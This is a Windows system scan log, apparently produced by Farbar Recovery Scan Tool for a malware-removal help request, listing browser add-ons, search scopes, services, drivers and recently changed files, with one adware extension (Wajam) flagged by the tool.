SearchScopes: HKLM-x32 -> {D943EABA-8E9F-40BE-861D-26636C0303F1} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=msie70a
SearchScopes: HKU\.DEFAULT -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-19 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-20 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {443789B7-F39C-4b5c-9287-DA72D38F4FE6} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=tb50TB50CLie7
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL =
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {AFBCB7E0-F91A-4951-9F31-58FEE57A25C4} URL = hxxp://www.ask.com/web?&o=101881&l=dis&q={SEARCHTERMS}
SearchScopes: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> {D943EABA-8E9F-40BE-861D-26636C0303F1} URL = hxxp://search.aol.com/aolcom/search?query={searchTerms}&invocationType=msie70a
BHO: AOL Toolbar Loader -> {3ef64538-8b54-4573-b48f-4d34b0238ab2} -> C:\Program Files\AOL Toolbar\aoltb.dll [2015-02-19] (AOL Inc.)
BHO: Windows Live Family Safety Browser Helper Class -> {4f3ed5cd-0726-42a9-87f5-d13f3d2976ac} -> C:\Program Files\Windows Live\Family Safety\fssbho.dll [2010-04-28] (Microsoft Corporation)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> c:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: No Name -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> No File
BHO-x32: AOL Toolbar Loader -> {3ef64538-8b54-4573-b48f-4d34b0238ab2} -> C:\Program Files (x86)\AOL Toolbar\aoltb.dll [2015-02-19] (AOL Inc.)
BHO-x32: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No File
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\coIEPlg.dll [2016-08-05] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\IPS\IPSBHO.DLL => No File
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\ssv.dll [2016-07-27] (Oracle Corporation)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> c:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-08-18] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\jp2ssv.dll [2016-07-27] (Oracle Corporation)
Toolbar: HKLM - AOL Toolbar - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} - C:\Program Files\AOL Toolbar\aoltb.dll [2015-02-19] (AOL Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\coIEPlg.dll [2016-08-05] (Symantec Corporation)
Toolbar: HKLM-x32 - AOL Toolbar - {ba00b7b1-0351-477a-b948-23e3ee5a73d4} - C:\Program Files (x86)\AOL Toolbar\aoltb.dll [2015-02-19] (AOL Inc.)
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} -  No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> &Links - {F2CF5485-4E02-4F68-819C-B92DE9277049} - C:\Windows\system32\ieframe.dll [2016-06-20] (Microsoft Corporation)
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {40D41A8B-D79B-43D7-99A7-9EE0F344C385} -  No File
Toolbar: HKU\S-1-5-21-1231050607-2223395895-1768608861-1000 -> No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
DPF: HKLM-x32 {138E6DC9-722B-4F4B-B09D-95D191869696} hxxp://www.bebo.com/files/BeboUploader.5.8.05.cab
DPF: HKLM-x32 {166B1BCA-3F9C-11CF-8075-444553540000} hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
DPF: HKLM-x32 {4871A87A-BFDD-4106-8153-FFDE2BAC2967} hxxp://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.5.0.cab
DPF: HKLM-x32 {48DD0448-9209-4F81-9F6D-D83562940134} hxxp://lads.myspace.com/upload/MySpaceUploader1006.cab
DPF: HKLM-x32 {49312E18-AA92-4CC2-BB97-55DEA7BCADD6} hxxps://support.dell.com/systemprofiler/SysProExe.CAB
DPF: HKLM-x32 {615F158E-D5CA-422F-A8E7-F6A5EED7063B} hxxp://www.worldwinner.com/games/v51/bejeweled/bejeweled.cab
DPF: HKLM-x32 {639658F3-B141-4D6B-B936-226F75A5EAC3} hxxp://chill.comcast.net/GameShell/online/en/DinerDash2/DinerDash2.1.0.0.68.cab
DPF: HKLM-x32 {74E4A24D-5224-4F05-8A41-99445E0FC22B} hxxp://www.gamehouse.com/games/gamehouse/ghplayer.cab
DPF: HKLM-x32 {8A94C905-FF9D-43B6-8708-F0F22D22B1CB} hxxp://www.worldwinner.com/games/shared/wwlaunch.cab
DPF: HKLM-x32 {8F6E7FB2-E56B-4F66-A4E1-9765D2565280} hxxp://www.worldwinner.com/games/launcher/ie/v2.22.01.0/iewwload.cab
DPF: HKLM-x32 {8FA2192F-B95D-40E3-898F-8D7ABB8E00D0} hxxp://webgames.d.tmsrv.com/c=090ebd64320856d8effccd9c89a96f87/aff=t_05en_wg/p/release/playtime/wg_mahjongescapeancientchina/mahjongescapeancientchina/GameFiles/SpinTopGamesLauncher.cab
DPF: HKLM-x32 {99FE5072-78AA-4FEE-89BA-69A5FA55343F} hxxp://download.microsoft.com/download/B/3/A/B3A2EA73-793D-4ABE-992D-C81140384044/igdtoolx.cab
DPF: HKLM-x32 {9C23D886-43CB-43DE-B2DB-112A68D7E10A} hxxp://lads.myspace.com/upload/MySpaceUploader2.cab
DPF: HKLM-x32 {AC2881FD-5760-46DB-83AE-20A5C6432A7E} hxxp://www.worldwinner.com/games/v67/swapit/swapit.cab
DPF: HKLM-x32 {BA35B9B8-DE9E-47C9-AFA7-3C77E3DDFD39} hxxp://www.worldwinner.com/games/v46/monopoly/monopoly.cab
DPF: HKLM-x32 {BFF1950D-B1B4-4AE8-B842-B2CCF06D9A1B} hxxp://aolsvc.aol.com/onlinegames/free-trial-mahjong-fortuna-2-deluxe/zylomplayer.cab
DPF: HKLM-x32 {D0C0F75C-683A-4390-A791-1ACFD5599AB8} hxxp://chill.comcast.net/Gameshell/GameHost/1.0/OberonGameHost.cab
DPF: HKLM-x32 {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} hxxp://aolsvc.aol.com/onlinegames/bejeweled2/popcaploader_v10.cab
DPF: HKLM-x32 {E2883E8F-472F-4FB0-9522-AC9BF37916A7} hxxp://platformdl.adobe.com/NOS/getPlusPlus/1.6/gp.cab
DPF: HKLM-x32 {F46BD8B1-DE4C-4A4F-B6F6-8FB68D25342D} hxxp://webgames.d.tmsrv.com/c=090ebd64320856d8effccd9c89a96f87/aff=t_03cm_wg/p/release/playfirst/wg_mahjong_roadshow/mahjong_roadshow/MahjongRoadshowWeb.1.0.0.16.cab
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-16] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\JHS-JJS\AppData\Roaming\Mozilla\Firefox\Profiles\w9t2iu8p.default-1450825045209
FF DefaultSearchEngine.US: Google
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2009-01-16] (Adobe Systems, Inc.)
FF Plugin-x32: @divx.com/DivX Browser Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2008-11-06] (DivX,Inc.)
FF Plugin-x32: @divx.com/DivX Player Plugin,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Player\npDivxPlayerPlugin.dll [2008-12-10] (DivX, Inc)
FF Plugin-x32: @garmin.com/GpsControl -> C:\Program Files (x86)\Garmin GPS Plugin\npGarmin.dll [2009-06-05] (GARMIN Corp.)
FF Plugin-x32: @java.com/DTPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\dtplugin\npDeployJava1.dll [2016-07-27] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.101.2 -> C:\Program Files (x86)\Java\jre1.8.0_101\bin\plugin2\npjp2.dll [2016-07-27] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50428.0\npctrl.dll [2016-04-27] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll [2008-11-13] (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-16] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WPF,version=3.5 -> c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll [2008-07-30] (Microsoft Corporation)
FF Plugin-x32: @movenetworks.com/Quantum Media Player -> C:\Users\JHS-JJS\AppData\Roaming\Move Networks\plugins\npqmp071706000001.dll [2010-02-20] (Move Networks)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.31.5\npGoogleUpdate3.dll [2016-07-28] (Google Inc.)
FF Plugin HKU\S-1-5-21-1231050607-2223395895-1768608861-1000: @movenetworks.com/Quantum Media Player -> C:\Users\JHS-JJS\AppData\Roaming\Move Networks\plugins\npqmp071706000001.dll [2010-02-20] (Move Networks)
FF Plugin HKU\S-1-5-21-1231050607-2223395895-1768608861-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\JHS-JJS\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2012-02-22] (Unity Technologies ApS)
FF SearchPlugin: C:\Users\JHS-JJS\AppData\Roaming\Mozilla\Firefox\Profiles\w9t2iu8p.default-1450825045209\searchplugins\norton-safe-search.xml [2016-08-12]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.2.15\coFFAddon
FF Extension: (Norton Identity Safe) - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.2.15\coFFAddon [2016-08-12]
FF HKLM-x32\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: (Microsoft .NET Framework Assistant) - c:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-01] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{7BA52691-1876-45ce-9EE6-54BCB3B04BBC}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\Norton\coFFPlgn => not found
FF HKLM-x32\...\Firefox\Extensions: [{3252b9ae-c69a-4eaf-9502-dc9c1f6c009e}] - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension
FF Extension: (Default Manager) - C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DMExtension [2011-01-12] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_22.5.2.15\coFFAddon
FF HKU\S-1-5-21-1231050607-2223395895-1768608861-1000\...\Firefox\Extensions: [[email protected]] - C:\Users\JHS-JJS\AppData\Roaming\Move Networks
FF Extension: (Move Media Player) - C:\Users\JHS-JJS\AppData\Roaming\Move Networks [2010-02-20] [not signed]

Chrome:
=======
CHR Profile: C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Docs) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-11-15]
CHR Extension: (Google Drive) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-11-15]
CHR Extension: (YouTube) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-11-15]
CHR Extension: (Google Search) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-11-15]
CHR Extension: (Wajam) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpmbfleldcgkldadpdinhjjopdfpjfjp [2013-11-15] [UpdateUrl: hxxp://www.wajam.com/update/Chrome/chrome_addon_updates.xml] <==== ATTENTION
CHR Extension: (Norton Identity Protection) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk [2013-11-15]
CHR Extension: (Google Wallet) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-11-15]
CHR Extension: (Gmail) - C:\Users\JHS-JJS\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2013-11-15]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\Exts\Chrome.crx [2016-08-27]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.7.0.11\Exts\Chrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\Exts\Chrome.crx [2016-08-27]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [jpmbfleldcgkldadpdinhjjopdfpjfjp] - C:\Users\JHS-JJS\AppData\Local\Wajam\Chrome\wajam.crx [2012-10-05]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AERTFilters; C:\Windows\system32\AERTSr64.exe [86016 2008-07-18] (Andrea Electronics Corporation)
S3 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [116104 2009-09-08] ()
R2 MSSQL$SQLEXPRESS; C:\Program Files (x86)\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
R2 N360; C:\Program Files (x86)\Norton Security Suite\Engine\22.7.1.32\N360.exe [289080 2016-08-16] (Symantec Corporation)
S3 Symantec RemoteAssist; C:\Program Files (x86)\Common Files\Symantec Shared\Support Controls\ssrc.exe [394704 2008-01-29] (Symantec, Inc.)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [383544 2008-01-20] (Microsoft Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security Suite\NortonData\22.5.2.15\Definitions\BASHDefs\20160826.008\BHDrvx64.sys [1854712 2016-08-18] (Symantec Corporation)
R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1607010.020\ccSetx64.sys [174328 2016-06-01] (Symantec Corporation)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [497392 2016-08-12] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [156912 2016-05-04] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security Suite\NortonData\22.5.2.15\Definitions\IPSDefs\20160829.001\IDSvia64.sys [876760 2016-07-08] (Symantec Corporation)
R2 RtNdPt60; C:\Windows\System32\DRIVERS\RtNdPt60.sys [26624 2008-07-21] (Windows ® Codename Longhorn DDK provider)
R1 SRTSP; C:\Windows\System32\Drivers\N360x64\1607010.020\SRTSP64.SYS [773360 2016-08-09] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1607010.020\SRTSPX64.SYS [48888 2016-06-01] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\N360x64\1607010.020\SYMEFASI64.SYS [1627352 2016-06-01] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [101112 2016-07-03] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\N360x64\1607010.020\Ironx64.SYS [291056 2016-06-01] (Symantec Corporation)
R1 SYMTDIv; C:\Windows\System32\Drivers\N360x64\1607010.020\SYMTDIV.SYS [468152 2016-06-01] (Symantec Corporation)
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security Suite\NortonData\22.5.2.15\Definitions\SDSDefs\20160703.001\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security Suite\NortonData\22.5.2.15\Definitions\SDSDefs\20160703.001\EX64.SYS [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-30 10:40 - 2016-08-30 10:41 - 00025346 _____ C:\Users\JHS-JJS\Desktop\FRST.txt
2016-08-30 10:40 - 2016-08-30 10:40 - 00000000 ____D C:\FRST
2016-08-30 10:38 - 2016-08-30 10:38 - 02397696 _____ (Farbar) C:\Users\JHS-JJS\Desktop\FRST64.exe
2016-08-27 15:17 - 2016-08-27 15:17 - 00000000 ____D C:\Windows\System32\Tasks\Norton 360
2016-08-27 15:12 - 2016-08-27 15:12 - 00003228 _____ C:\Windows\System32\Tasks\Norton WSC Integration
2016-08-24 16:15 - 2008-02-06 20:57 - 00114688 _____ (Viewpoint Corporation) C:\Users\JHS-JJS\AppData\LocalLow\vmpremov.exe
2016-08-21 13:34 - 2016-08-05 13:56 - 00728356 _____ C:\Windows\ntbtlog.txt
2016-08-14 10:44 - 2008-01-20 22:50 - 00363008 _____ (Microsoft Corporation) C:\Windows\system32\cmd - Copy.exe
2016-08-12 13:26 - 2016-08-12 13:26 - 45702448 _____ C:\Users\JHS-JJS\Downloads\Firefox Setup 43.0.1 (6).exe
2016-08-09 12:37 - 2016-08-09 12:37 - 01204056 _____ (Symantec Corporation) C:\Users\JHS-JJS\Downloads\AutoDetectPkg.exe
2016-08-02 10:56 - 2016-06-10 10:45 - 02802176 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2016-08-02 10:47 - 2016-06-25 12:04 - 00792064 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2016-08-02 10:47 - 2016-06-25 12:04 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-08-02 10:47 - 2016-06-25 12:04 - 00261120 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.dll
2016-08-02 10:47 - 2016-06-25 12:03 - 00161280 _____ (Microsoft Corporation) C:\Windows\system32\inetpp.dll
2016-08-02 10:47 - 2016-06-25 12:03 - 00018432 _____ (Microsoft Corporation) C:\Windows\system32\inetppui.dll
2016-08-02 10:47 - 2016-06-25 11:37 - 00626176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\localspl.dll
2016-08-02 10:47 - 2016-06-25 11:37 - 00443904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2016-08-02 10:47 - 2016-06-25 11:37 - 00216064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.dll
2016-08-02 10:47 - 2016-06-25 11:09 - 00061440 _____ (Microsoft Corporation) C:\Windows\system32\ntprint.exe
2016-08-02 10:47 - 2016-06-25 11:09 - 00048128 _____ (Microsoft Corporation) C:\Windows\system32\wpnpinst.exe
2016-08-02 10:47 - 2016-06-25 10:40 - 00061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntprint.exe
2016-08-01 22:29 - 2016-06-20 14:24 - 18804736 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2016-08-01 22:29 - 2016-06-20 14:21 - 02351616 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2016-08-01 22:29 - 2016-06-20 14:16 - 10940416 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2016-08-01 22:29 - 2016-06-20 14:15 - 01389056 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2016-08-01 22:29 - 2016-06-20 14:15 - 00448512 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2016-08-01 22:29 - 2016-06-20 14:14 - 02159104 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-08-01 22:29 - 2016-06-20 14:14 - 01392640 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2016-08-01 22:29 - 2016-06-20 14:14 - 00579584 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 02382848 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2016-08-01 22:29 - 2016-06-20 14:13 - 01494528 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2016-08-01 22:29 - 2016-06-20 14:13 - 00816640 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00729088 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00452608 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00281600 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00248320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00237056 _____ (Microsoft Corporation) C:\Windows\system32\url.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00173568 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2016-08-01 22:29 - 2016-06-20 14:13 - 00096256 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00086016 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00055296 _____ (Microsoft Corporation) C:\Windows\system32\msfeedsbs.dll
2016-08-01 22:29 - 2016-06-20 14:13 - 00012800 _____ (Microsoft Corporation) C:\Windows\system32\mshta.exe
2016-08-01 22:29 - 2016-06-20 14:13 - 00011264 _____ (Microsoft Corporation) C:\Windows\system32\msfeedssync.exe
2016-08-01 22:29 - 2016-06-20 13:50 - 01815552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2016-08-01 22:29 - 2016-06-20 13:48 - 12842496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2016-08-01 22:29 - 2016-06-20 13:46 - 00367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2016-08-01 22:29 - 2016-06-20 13:45 - 09755136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2016-08-01 22:29 - 2016-06-20 13:45 - 01140224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2016-08-01 22:29 - 2016-06-20 13:44 - 01129984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 01804800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 01427968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2016-08-01 22:29 - 2016-06-20 13:43 - 00719360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 00425472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 00231936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\url.dll
2016-08-01 22:29 - 2016-06-20 13:43 - 00142848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2016-08-01 22:29 - 2016-06-20 13:43 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 02382848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2016-08-01 22:29 - 2016-06-20 13:42 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00354304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00223744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00176640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00072704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00041472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedsbs.dll
2016-08-01 22:29 - 2016-06-20 13:42 - 00011776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshta.exe
2016-08-01 22:29 - 2016-06-20 13:42 - 00010752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-08-30 10:37 - 2016-06-28 11:18 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-08-30 10:35 - 2010-04-18 02:53 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2016-08-30 10:35 - 2008-09-22 10:10 - 00000288 _____ C:\Windows\Tasks\RtlNICDiagVistaStart.job
2016-08-30 10:35 - 2006-11-02 11:42 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2016-08-30 10:35 - 2006-11-02 11:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2016-08-30 10:35 - 2006-11-02 11:22 - 00003616 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2016-08-30 10:34 - 2006-11-02 11:42 - 00032560 _____ C:\Windows\Tasks\SCHEDLGU.TXT
2016-08-30 10:28 - 2010-04-18 02:53 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2016-08-30 10:07 - 2006-11-02 09:33 - 00000000 ____D C:\Windows\inf
2016-08-30 10:07 - 2006-11-02 08:46 - 00832852 _____ C:\Windows\system32\PerfStringBackup.INI
2016-08-27 16:43 - 2008-10-28 14:36 - 00000000 ___RD C:\Users\JHS-JJS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup(233)
2016-08-27 15:29 - 2016-07-03 14:50 - 00000000 ____D C:\Windows\System32\Tasks\Remediation
